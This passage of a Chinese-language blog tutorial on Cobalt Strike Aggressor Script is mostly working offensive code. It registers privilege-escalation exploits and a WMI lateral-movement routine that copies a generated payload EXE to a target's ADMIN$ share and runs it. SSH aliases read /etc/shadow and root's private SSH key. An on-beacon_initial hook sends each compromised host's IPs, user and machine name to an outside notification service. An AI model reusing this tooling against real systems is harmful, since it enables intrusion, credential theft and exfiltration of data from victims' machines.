	<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span>getFileProper<span class="token punctuation">(</span>script_resource<span class="token punctuation">(</span><span class="token string">&quot;modules&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot;Invoke-MS16032.ps1&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
	<span class="token variable">$script</span> <span class="token operator">=</span> readb<span class="token punctuation">(</span><span class="token variable">$handle</span>, -1<span class="token punctuation">)</span><span class="token punctuation">;</span>
	closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># host the script in Beacon</span>
	<span class="token variable">$oneliner</span> <span class="token operator">=</span> beacon_host_script<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token variable">$script</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># run the specified command via this exploit.</span>
	bpowerpick<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Invoke-MS16032 -Command <span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span>, <span class="token variable">$oneliner</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><h2 id="privilege-escalation-spawn-a-session">Privilege Escalation (Spawn a Session) <a href="#privilege-escalation-spawn-a-session" class="header-anchor">#</a></h2> <blockquote><p>官方权限提升，产生新会话</p></blockquote> <p>源码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;ms15-051&quot;</span>, <span class="token string">&quot;Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)&quot;</span>, <span class="token operator">&amp;</span>ms15_051_exploit<span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="lateral-movement-spawn-a-session">Lateral Movement (Spawn a Session) <a href="#lateral-movement-spawn-a-session" class="header-anchor">#</a></h2> <blockquote><p>官方横向移动源码</p></blockquote> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon_remote_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;wmi&quot;</span>, <span class="token string">&quot;x86&quot;</span>, <span class="token string">&quot;Use WMI to run a Beacon payload&quot;</span>, lambda<span class="token punctuation">(</span><span class="token operator">&amp;</span>wmi_remote_spawn, <span class="token variable">$arch</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;x86&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
beacon_remote_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;wmi64&quot;</span>, <span class="token string">&quot;x64&quot;</span>, <span class="token string">&quot;Use WMI to run a Beacon payload&quot;</span>, lambda<span class="token punctuation">(</span><span class="token operator">&amp;</span>wmi_remote_spawn, <span class="token variable">$arch</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;x64&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># $1 = bid, $2 = target, $3 = listener</span>
sub wmi_remote_spawn <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$name</span> <span class="token variable">$exedata</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked Beacon to jump to <span class="token variable">$2</span> (&quot;</span> <span class="token builtin class-name">.</span> listener_describe<span class="token punctuation">(</span><span class="token variable">$3</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;) via WMI&quot;</span>, <span class="token string">&quot;T1047&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># we need a random file name.</span>
	<span class="token variable">$name</span> <span class="token operator">=</span> rand<span class="token punctuation">(</span>@<span class="token punctuation">(</span><span class="token string">&quot;malware&quot;</span>, <span class="token string">&quot;evil&quot;</span>, <span class="token string">&quot;detectme&quot;</span><span class="token punctuation">))</span> <span class="token builtin class-name">.</span> rand<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;.exe&quot;</span><span class="token punctuation">;</span>

	<span class="token comment"># generate an EXE. $arch defined via &amp;lambda when this function was registered with</span>
	<span class="token comment"># beacon_remote_exploit_register</span>
	<span class="token variable">$exedata</span> <span class="token operator">=</span> artifact_payload<span class="token punctuation">(</span><span class="token variable">$3</span>, <span class="token string">&quot;exe&quot;</span>, <span class="token variable">$arch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># upload the EXE to our target (directly)</span>
	bupload_raw<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;<span class="token entity" title="\\">\\</span><span class="token entity" title="\\">\\</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\\">\\</span>ADMIN\$<span class="token entity" title="\\">\\</span> $+ <span class="token variable">$name</span>&quot;</span>, <span class="token variable">$exedata</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># execute this via WMI</span>
	brun<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;wmic /node:<span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\&quot;">\&quot;</span> process call create <span class="token entity" title="\&quot;">\&quot;</span><span class="token entity" title="\\">\\</span><span class="token entity" title="\\">\\</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\\">\\</span>ADMIN\$<span class="token entity" title="\\">\\</span> $+ <span class="token variable">$name</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># assume control of our payload (if it's an SMB or TCP Beacon)</span>
	beacon_link<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token variable">$2</span>, <span class="token variable">$3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div><p>上面涉及到的 数据模型 和 事件，在官方文档中都可以找到。</p> <h1 id="ssh-sessions">SSH Sessions <a href="#ssh-sessions" class="header-anchor">#</a></h1> <blockquote><p>和 beacon 一样也是信标，但是是从 Liunx 主机上返回的</p></blockquote> <p>如何上线一台 Liunx 主机呢?我们可以按照传统的方法使用官方给的方式，直接在 Beacon 中去链接内网中的liunx主机，语法如下：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon<span class="token operator">&gt;</span> <span class="token function">ssh</span> <span class="token operator">&lt;</span>IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>port<span class="token operator">&gt;</span><span class="token operator">&lt;</span>username<span class="token operator">&gt;</span><span class="token operator">&lt;</span>password<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>我在本地开一台liunx主机，然后我们在横向上线：</p> <p><img src="/images/Aggressor-Script/image-20201215222850956.png" alt="image-20201215222850956"></p> <p>可以发现我们得到一台liunx主机，这里上线 Liunx 主机的的作用大概是为了好看一点，能够很快速的定位liunx主机是由那个windows打通的，其他的就不给予评价，个人感觉可以直接ssh登录就行</p> <p>当我们登录成功以后，我们就可以在 Liunx主机上执行命令，和 beacon 差不多：</p> <p><img src="/images/Aggressor-Script/image-20201215223153091.png" alt="image-20201215223153091"></p> <p>除了官方的方式上线，我们可以使用 Cross C2，下载地址：https://github.com/gloxec/CrossC2/releases/tag/v2.1</p> <p>官方文档：https://gloxec.github.io/CrossC2/zh_cn/</p> <h2 id="会话类型的判断">会话类型的判断 <a href="#会话类型的判断" class="header-anchor">#</a></h2> <p>当我们上线主机后，可以使用 <strong>-isssh</strong> 数据模型检查是否为Liunx主机，它接受一个参数</p> <p><code>$1</code> 信标的会话ID，如果是的话就执行下面的代码或者函数</p> <p>我们来判断一下我们的主机是否为 Liunx 还是 Win</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> what <span class="token punctuation">{</span>
	foreach @ID <span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">))</span><span class="token punctuation">{</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span>-isssh @ID<span class="token punctuation">)</span><span class="token punctuation">{</span>
			println<span class="token punctuation">(</span>@ID.<span class="token string">&quot; 是liunx主机&quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot; 机器名是：&quot;</span>.beacon_info<span class="token punctuation">(</span>@ID,<span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span>.<span class="token string">&quot; 用户名是：&quot;</span>.beacon_info<span class="token punctuation">(</span>@ID,<span class="token string">&quot;user&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
		else<span class="token punctuation">{</span>
			println<span class="token punctuation">(</span>@ID.<span class="token string">&quot; 是windo主机 &quot;</span><span class="token builtin class-name">.</span><span class="token string">&quot; 机器名是：&quot;</span>.beacon_info<span class="token punctuation">(</span>@ID,<span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span>.<span class="token string">&quot; 用户名是：&quot;</span>.beacon_info<span class="token punctuation">(</span>@ID,<span class="token string">&quot;user&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
		<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>运行一下：</p> <p><img src="/images/Aggressor-Script/image-20201215230423505.png" alt="image-20201215230423505"></p> <p>判断出了我们的主机信息</p> <h2 id="ssh-aliases">SSH Aliases <a href="#ssh-aliases" class="header-anchor">#</a></h2> <blockquote><p>和 beacon alias 一样，我们也可以为 liunx 主机创建 SSH 控制台命令，比如查看我们的 /etc/password：</p></blockquote> <p>下面的 <code>$1</code> 是信标的会话 ID</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias hashdump <span class="token punctuation">{</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>-isadmin <span class="token variable">$1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token comment"># 判断是否为管理员，因为password非管理员不等查看</span>
		binput<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;导出passwod的HASH：&quot;</span><span class="token punctuation">)</span>
		bshell<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;cat /etc/shadow&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
	<span class="token keyword">else</span> <span class="token punctuation">{</span>
		berror<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;你不是管理员！！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215231244460.png" alt="image-20201215231244460"></p> <p>当然你也可以写其他命令，bshell 数据模型是用来执行命令的，他需要的参数如下：</p> <p><code>$1</code> 信标的会话ID</p> <p><code>$2</code> 需要执行的命令</p> <p>比如我们查看 liunx 主机的SSH密匙的信息：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias ssh_demo<span class="token punctuation">{</span>
	binput<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;打印SSH私钥信息&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bshell<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;cat /root/.ssh/id_rsa&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>运行：</p> <p><img src="/images/Aggressor-Script/image-20201215231926776.png" alt="image-20201215231926776"></p> <h2 id="ssh-command-register">ssh_command_register <a href="#ssh-command-register" class="header-anchor">#</a></h2> <p>当自定义一个 ssh命令 以后，只有自己知道这个 命令的具体使用方式，当想要所有人都知道这条命令的含义的时候，我们可以使用 ssh_command_register 数据模型  显示帮助信息，他需要接受三个参数</p> <p><code>$1</code> 自定义的命令</p> <p><code>$2</code> 命令的介绍</p> <p><code>$3</code> 帮助信息，类似告诉他怎么用</p> <p>举一个例子，现在我写一个命令用于从根目录查找我们想要的文件：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias <span class="token function">find</span> <span class="token punctuation">{</span>
	bshell<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;find / -name <span class="token variable">$2</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

ssh_command_register <span class="token punctuation">(</span>
	<span class="token string">&quot;find&quot;</span>,
	<span class="token string">&quot;查找你想要的文件从根目录开始&quot;</span>,
	<span class="token string">&quot;使用方式: find test.txt&quot;</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216121638204.png" alt="image-20201216121638204"></p> <p>在 ssh 控制台中输入 ? 号就可以查看到命令和他的解释，使用 <code>help find</code> 可以查看到这个命令的使用方式解析：</p> <p><img src="/images/Aggressor-Script/image-20201216121955524.png" alt="image-20201216121955524"></p> <p>我们运行一下：</p> <p><img src="/images/Aggressor-Script/image-20201216122032723.png" alt="image-20201216122032723"></p> <h2 id="reacting-to-new-ssh-sessions">Reacting to new SSH Sessions <a href="#reacting-to-new-ssh-sessions" class="header-anchor">#</a></h2> <p>和 beacon 一样，当有新的Liunx主机上线时，我们做的事情，使用 ssh_initial 实事件触发，如下：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>on ssh_initial <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;有新的LIUNX主机上线<span class="token entity" title="\n">\n</span>IP为&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;internal&quot;</span><span class="token punctuation">)</span>.<span class="token string">&quot;<span class="token entity" title="\n">\n</span>主机名字为：&quot;</span>.beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;computer&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>

<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216123313505.png" alt="image-20201216123313505"></p> <h2 id="popup-menus">Popup Menus <a href="#popup-menus" class="header-anchor">#</a></h2> <p>适合liunx主机的右键菜单</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token function">ssh</span> <span class="token punctuation">{</span>
	item <span class="token string">&quot;执行命令&quot;</span> <span class="token punctuation">{</span>
		prompt_text<span class="token punctuation">(</span><span class="token string">&quot;你想运行哪一个命令?&quot;</span>, <span class="token string">&quot;w&quot;</span>, lambda<span class="token punctuation">(</span><span class="token punctuation">{</span>
			binput<span class="token punctuation">(</span>@ids, <span class="token string">&quot;shell <span class="token variable">$1</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			bshell<span class="token punctuation">(</span>@ids, <span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>, @ids <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$1</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216124754601.png" alt="image-20201216124754601"></p> <p>使用方式和Beacon基本相同，所以不再赘述</p> <h1 id="server酱上线代码解析">Server酱上线代码解析 <a href="#server酱上线代码解析" class="header-anchor">#</a></h1> <blockquote><p>代码来源：算命瞎子：http://www.nmd5.com/?p=567</p></blockquote> <p>源代码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># 循环获取所有beacon</span>
on beacon_initial <span class="token punctuation">{</span>

    sub http_get <span class="token punctuation">{</span>
        local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$output</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token punctuation">[</span>new java.net.URL: <span class="token variable">$1</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$stream</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$url</span> openStream<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token punctuation">[</span>SleepUtils getIOHandle: <span class="token variable">$stream</span>, <span class="token variable">$null</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

        @content <span class="token operator">=</span> readAll<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        foreach <span class="token variable">$line</span> <span class="token punctuation">(</span>@content<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$output</span> .<span class="token operator">=</span> <span class="token variable">$line</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;<span class="token entity" title="\r">\r</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        println<span class="token punctuation">(</span><span class="token variable">$output</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token comment">#获取ip、计算机名、登录账号</span>
    <span class="token variable">$externalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;external&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$internalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;internal&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$userName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;user&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$computerName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token comment">#get一下Server酱的链接</span>
    <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token string">'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&amp;desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'</span><span class="token builtin class-name">.</span><span class="token variable">$externalIP</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'</span><span class="token builtin class-name">.</span><span class="token variable">$internalIP</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'</span><span class="token builtin class-name">.</span><span class="token variable">$userName</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'</span><span class="token builtin class-name">.</span><span class="token variable">$computerName</span><span class="token punctuation">;</span>

    http_get<span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token punctuation">}</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br></div></div><p>整体代码流程是，监听上线事件，当有新的主机上线的时候我们就执行代码：</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment">#上线事件的监听</span>

on beacon_initial <span class="token punctuation">{</span>
	<span class="token punctuation">..</span><span class="token punctuation">..</span><span class="token punctuation">..</span> <span class="token comment"># 代码</span>
<span class="token punctuation">}</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>然后呢定义一个请求函数</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>    sub http_get <span class="token punctuation">{</span>
        local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$output</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token punctuation">[</span>new java.net.URL: <span class="token variable">$1</span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token comment"># 实例化URL请求，$1为待输入的URl</span>
        <span class="token variable">$stream</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$url</span> openStream<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token punctuation">[</span>SleepUtils getIOHandle: <span class="token variable">$stream</span>, <span class="token variable">$null</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

        @content <span class="token operator">=</span> readAll<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        foreach <span class="token variable">$line</span> <span class="token punctuation">(</span>@content<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$output</span> .<span class="token operator">=</span> <span class="token variable">$line</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;<span class="token entity" title="\r">\r</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        println<span class="token punctuation">(</span><span class="token variable">$output</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><p>将刚上线的主机的 外网IP 内网IP 用户名 主机信息 提取出来，优化输出</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>    <span class="token comment">#获取ip、计算机名、登录账号</span>
    <span class="token variable">$externalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;external&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$internalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;internal&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$userName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;user&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$computerName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>最后格式化一下URL再请求</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>    <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token string">'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&amp;desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'</span><span class="token builtin class-name">.</span><span class="token variable">$externalIP</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'</span><span class="token builtin class-name">.</span><span class="token variable">$internalIP</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'</span><span class="token builtin class-name">.</span><span class="token variable">$userName</span><span class="token builtin class-name">.</span><span class="token string">'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'</span><span class="token builtin class-name">.</span><span class="token variable">$computerName</span><span class="token punctuation">;</span>

    http_get<span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
